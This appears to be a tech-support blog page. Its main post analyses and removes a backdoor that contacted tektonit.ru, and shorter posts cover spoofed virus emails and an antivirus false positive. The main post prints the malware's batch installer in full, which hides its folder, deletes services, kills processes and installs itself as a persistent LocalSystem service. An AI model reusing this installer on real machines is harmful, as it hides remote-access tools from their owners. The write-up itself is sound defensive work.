A nasty piece of work in C:\ProgramData\WindowsWork

I encountered a nasty bit of malware today which wasn’t being seen by antivirus. Malwarebytes was popping up every 5 seconds with a warning that some executable file on Windows 10 was trying to reach a blocked web site… tektonit.ru

A quick Google search made it clear that the domain being contacted is associated with the Troj/RemAdm-AG and Backdoor.Gussdoor trojans, the second of which opens a backdoor to the domain in question. The attacker then has access to read and write files, access the registry, spawn processes and even take screenshots. In our case, they also installed keylogger.bestfreekeylogger.a which lets them record keystrokes like passwords, credit card numbers, emails, or any other content entered via the computer.

Nasty.

The user had both a McAfee antivirus product and Avast Free installed. Neither of which were really complaining about the threat, yet Malwarebytes continued its little dance in the corner “Website blocked – Domain: tektonit.ru” and variants thereof.

Malwarebytes also did something else nice for me: it showed the process location. It was running a file in C:\ProgramData\WindowsWork, which to an end-user appears to not exist if you try to navigate to it.

I installed ESET Internet Security, which picked up and removed the keylogger (two variants) that the other applications left behind, but the malware reaching out to the attacking server was not detected.

Jumping into an admin terminal, the directory doesn’t show since its attributes are set to +s +h (system, hidden). Within the folder, the files themselves are also hidden and set with the system attribute, making them pretty much invisible to end users. And strangely, antivirus also did not see it.

Removing the attributes, I was now able to see and open the files. One such file was the installer used to deploy the malware.

Here’s how it installed itself:

@echo off
attrib +s +h "C:\ProgramData\WindowsWork"
cd C:\ProgramData\WindowsWork\
 
sc stop RManService
sc stop ServiceWork
sc delete RManService
sc delete ServiceWork
taskkill /im rfusclient.exe /f
taskkill /im rutserv.exe /f
reg delete "HKLM\SYSTEM\System Information\Driver" /f
 
regedit /s "C:\ProgramData\WindowsWork\config_set.reg"
"C:\ProgramData\WindowsWork\syswork.exe" /silentinstall
"C:\ProgramData\WindowsWork\syswork.exe" /firewall
regedit /s "C:\ProgramData\WindowsWork\config_set.reg"
sc failure ServiceWork reset= 0 actions= restart/1000/restart/1000/restart/1000
sc config ServiceWork obj= LocalSystem type= interact type= own
"C:\ProgramData\WindowsWork\syswork.exe" /start
 
del C:\ProgramData\WindowsWork\config_set.reg /q
del C:\ProgramData\WindowsWork\WinUpdate.exe /q
del C:\ProgramData\WindowsWork\WorkInstall2.bat /q
attrib +s +h "C:\ProgramData\WindowsWork\*.*"
del C:\ProgramData\WindowsWork\WorkInstall.bat /q
 
exit

Interesting, in that this now sheds some light on why antivirus isn’t picking it up… it’s likely not even a virus. And to boot, UAC would have stopped this script from running, which means the end user had to have allowed it. Once again proves my point that Windows UAC is useless because novice users will just say yes to any stinking dialogue you throw at them!

So the script, as you can see, destroys legitimate Windows services and replaces them with itself. That makes it tough to detect.

I killed the services, deleted the services, and then purged all the files in the C:\ProgramData\WindowsWork\ and removed the folder. Instantly, Malwarebytes went to sleep.

A reboot and full system scan as administrator with ESET Internet Security, and all looks well. Hopefully the firewall in EIS will do a better job of keeping the user from answering “Yes” to the wrong questions… but ultimately it’s up to educating users to think, and understand, before clicking.

The malware is gone. However, there’s no way to know how far the attacker got. It appears as though the service files were not viruses at all, but rather basic programs that reach out to tektonit.ru to obtain legitimate malware and install it. Basically, the stuff in C:\ProgramData\WindowsWork\, which the user authorized being installed, was benign from an antimalware standpoint. It was not a virus: it was a tool being used by an attacker to propagate their tools, malware and possibly viruses/trojans. But because of the nature of it, it also worked as a bit of a smokescreen.

In this instance, had Malwarebytes’ Premium version not been installed (which does active protection, not just on-demand scanning), the user would have been wide open to the smokescreen application and its desire to install all kinds of unknowns on the user’s system.

ESET Internet Security is now installed, along with Malwarebytes Premium. These two products combined should provide about the best level of protection available to Windows users today.

Get ESET Internet Security: https://cat5.tv/esetus

Get Malwarebytes Premium: http://amzn.to/2x2HCz2

Why am I receiving virus emails from old friends?

A customer emailed me, puzzled by why they’re suddenly receiving a bunch of virus emails from friends they haven’t spoken to in a number of years.

These types of mass-mail viruses can be very confusing, since they nearly always appear to come from someone you know.

Here’s why and how that happens…

Let’s say someone who you haven’t talked to in a few years (we’ll call him “Bruce”), who is part of the same “circle of friends”, caught a virus.  So the virus goes into their address book and starts mass mailing everyone in the address book, and spoofs who it is from.

Bruce’s address book:

  • John
  • Betty
  • Doug

Bruce gets a virus.  The virus sends an email to John pretending to be Betty, and an email to Doug pretending to be John.

Doug replies to John and says “You have a virus!” But John doesn’t have a virus; Bruce does.

It’s often difficult or impossible to track down the true culprit, and that’s why it’s imperative that everyone on Microsoft Windows have an up-to-date Virus Scanner such as ESET Smart Security 6.  It is also important on any platform (Windows, Mac, Linux, or even Smart Phone) that you be familiar with phishing scams, and be extra cautious what you open or click.

SUPERAntiSpyware falsely detecting Trojan.Agent/Gen-Kryptik

Many SUPERAntiSpyware users are experiencing an annoying (and possibly costly) problem this morning.  Apparently their system became infected with hundreds of copies of Trojan.Agent/Gen-Kryptik over the weekend.

After looking in-depth at a number of client systems, it would appear the alerts are false-positives.
Continue reading